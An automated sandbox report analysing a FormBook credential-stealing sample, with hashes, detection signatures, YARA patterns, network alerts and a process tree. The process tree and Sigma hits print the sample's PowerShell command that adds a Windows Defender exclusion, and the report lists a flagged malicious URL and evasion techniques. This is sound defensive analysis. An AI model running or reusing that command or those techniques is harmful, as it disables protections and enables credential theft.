Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe
Analysis ID:1467140
MD5:0d866e84b1b42f3b924d671db5b3b40e
SHA1:8890d49ef3267c6c6697c0e56b85ce118e0f7eef
SHA256:74f7be7a0e6e10f0209d700876ab03eb9d37cdcab79c0def5d536eb8accbf49f
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Disables UAC (registry)
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe (PID: 1512 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" MD5: 0D866E84B1B42F3B924D671DB5B3B40E)
    • conhost.exe (PID: 2496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5072 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6904 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • csc.exe (PID: 1816 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
    • wmplayer.exe (PID: 6464 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" MD5: A7790328035BBFCF041A6D815F9C28DF)
      • NwXvnHITawmpBkkZKEXJ.exe (PID: 4324 cmdline: "C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sc.exe (PID: 6836 cmdline: "C:\Windows\SysWOW64\sc.exe" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • NwXvnHITawmpBkkZKEXJ.exe (PID: 5680 cmdline: "C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2876 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • WerFault.exe (PID: 716 cmdline: C:\Windows\system32\WerFault.exe -u -p 1512 -s 1456 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • wmplayer.exe (PID: 768 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" MD5: A7790328035BBFCF041A6D815F9C28DF)
    • unregmp2.exe (PID: 2244 cmdline: "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon MD5: 51629AAAF753C6411D0B7D37620B7A83)
      • unregmp2.exe (PID: 2196 cmdline: "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT MD5: A6FC8CE566DEC7C5873CB9D02D7B874E)
  • wmplayer.exe (PID: 6508 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" MD5: A7790328035BBFCF041A6D815F9C28DF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.3944875828.0000000003180000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000D.00000002.3944875828.0000000003180000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a9f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13f5f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000006.00000002.2322232096.00000000035F0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.2322232096.00000000035F0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2a9f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x13f5f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        Click to see the 14 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        6.2.wmplayer.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          6.2.wmplayer.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2dd13:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17282:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          0.2.SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe.1df0bbf5348.1.raw.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
          • 0x4354e:$e1: Microsoft\Windows Defender\Exclusions\Paths
          • 0x44e12:$e1: Microsoft\Windows Defender\Exclusions\Paths
          • 0x44e8e:$e1: Microsoft\Windows Defender\Exclusions\Paths
          • 0x4f2ac:$e2: Add-MpPreference -ExclusionPath
          • 0x5076c:$e2: Add-MpPreference -ExclusionPath
          6.2.wmplayer.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            6.2.wmplayer.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2cf13:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16482:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            Click to see the 1 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, ParentProcessId: 1512, ParentProcessName: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force, ProcessId: 5072, ProcessName: powershell.exe
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\Windows Media Player\wmplayer.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\sc.exe, ProcessId: 6836, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PTR4CRBH
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, ParentProcessId: 1512, ParentProcessName: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force, ProcessId: 5072, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, ParentProcessId: 1512, ParentProcessName: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force, ProcessId: 5072, ProcessName: powershell.exe

            Snort Signatures

            Timestamp:07/03/24-18:41:52.311175
            SID:2855464
            Source Port:59424
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:41:19.435884
            SID:2855464
            Source Port:59417
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:42:13.805576
            SID:2855465
            Source Port:59432
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:43:25.886197
            SID:2855464
            Source Port:59451
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:43:37.573012
            SID:2855464
            Source Port:59454
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:40:48.928266
            SID:2855464
            Source Port:59407
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:42:55.058990
            SID:2855464
            Source Port:59441
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:43:51.413894
            SID:2855464
            Source Port:59458
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:41:32.918372
            SID:2855464
            Source Port:59421
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:42:06.211099
            SID:2855464
            Source Port:59429
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:42:27.326971
            SID:2855465
            Source Port:59436
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:43:45.249021
            SID:2855465
            Source Port:59457
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:42:08.749026
            SID:2855464
            Source Port:59430
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:43:30.949272
            SID:2855465
            Source Port:59453
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:42:41.373375
            SID:2855464
            Source Port:59437
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:40:56.597601
            SID:2855465
            Source Port:59410
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:42:19.719004
            SID:2855464
            Source Port:59433
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:43:59.021042
            SID:2855465
            Source Port:59461
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:41:37.979242
            SID:2855465
            Source Port:59423
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:41:54.857034
            SID:2855464
            Source Port:59426
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:42:57.593154
            SID:2855464
            Source Port:59442
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:44:08.627000
            SID:2855465
            Source Port:59462
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:41:30.383840
            SID:2855464
            Source Port:59420
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:42:22.262975
            SID:2855464
            Source Port:59434
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:41:06.087866
            SID:2855464
            Source Port:59412
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:43:02.663109
            SID:2855465
            Source Port:59445
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:43:11.697394
            SID:2855464
            Source Port:59447
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:41:59.948522
            SID:2855465
            Source Port:59428
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:42:49.010973
            SID:2855465
            Source Port:59440
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:43:23.357004
            SID:2855464
            Source Port:59450
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:41:24.528998
            SID:2855465
            Source Port:59419
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:40:33.146485
            SID:2855465
            Source Port:59401
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:42:43.900906
            SID:2855464
            Source Port:59438
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:41:16.892814
            SID:2855464
            Source Port:59416
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:43:16.765404
            SID:2855465
            Source Port:59449
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:41:03.551279
            SID:2855464
            Source Port:59411
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:43:40.139322
            SID:2855464
            Source Port:59455
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:40:51.463532
            SID:2855464
            Source Port:59408
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:43:53.949463
            SID:2855464
            Source Port:59459
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:41:11.155608
            SID:2855465
            Source Port:59414
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/03/24-18:43:09.167025
            SID:2855464
            Source Port:59446
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.vertilehub.xyz/ei4t/?3pSl=bXiTJHhxyN&Z6ZTG=vJK+R49o60hMb5R0zuW0LjMDSBoWblw/xm7bGUo972WEnNUAqilJR4ikt7uwBrcRV8UZThTaEWZ7S+DdGKZTmgrpJBBQs9ifJOYm4nfBSZlzTv8zXZPL/ZPwonFSFx1LsUa4ZMM=Avira URL Cloud: Label: malware
            Source: http://www.vertilehub.xyz/ei4t/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeReversingLabs: Detection: 21%
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.3944875828.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2322232096.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3948817261.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3945190684.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3945837611.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2322275427.00000000040C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Exploits

            barindex
            Yara detected UAC Bypass using CMSTP
            Source: Yara matchFile source: 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe PID: 1512, type: MEMORYSTR
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF246C0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.PDB source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: System.Windows.Forms.ni.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.PDBH source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2453568054.000000AA40102000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: wmplayer.exe, 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2230114991.00000000030F5000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2228408124.0000000002F48000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.2321922412.000000000343E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000D.00000003.2321954921.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000D.00000003.2323720085.000000000338F000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: sc.pdbUGP source: wmplayer.exe, 00000006.00000002.2321810526.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3944318113.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.ni.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: wntdll.pdb source: wmplayer.exe, wmplayer.exe, 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2230114991.00000000030F5000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2228408124.0000000002F48000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.2321922412.000000000343E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, sc.exe, 0000000D.00000003.2321954921.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000D.00000003.2323720085.000000000338F000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.PDB source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2453568054.000000AA40102000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: sc.pdb source: wmplayer.exe, 00000006.00000002.2321810526.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3944318113.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: System.Drawing.ni.pdbRSDS source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbCoe source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A0A3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: System.Core.ni.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: pC:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.PDB source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2453568054.000000AA40102000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: mscorlib.pdb` source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A114000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A114000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp, WER9BF4.tmp.dmp.9.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb.0e source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF246C0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbx. source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A114000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3942485337.0000000000A7E000.00000002.00000001.01000000.00000009.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000000.2386545627.0000000000A7E000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: System.Drawing.pdb source: WER9BF4.tmp.dmp.9.dr
            Source: Binary string: mscorlib.ni.pdb source: WER9BF4.tmp.dmp.9.dr
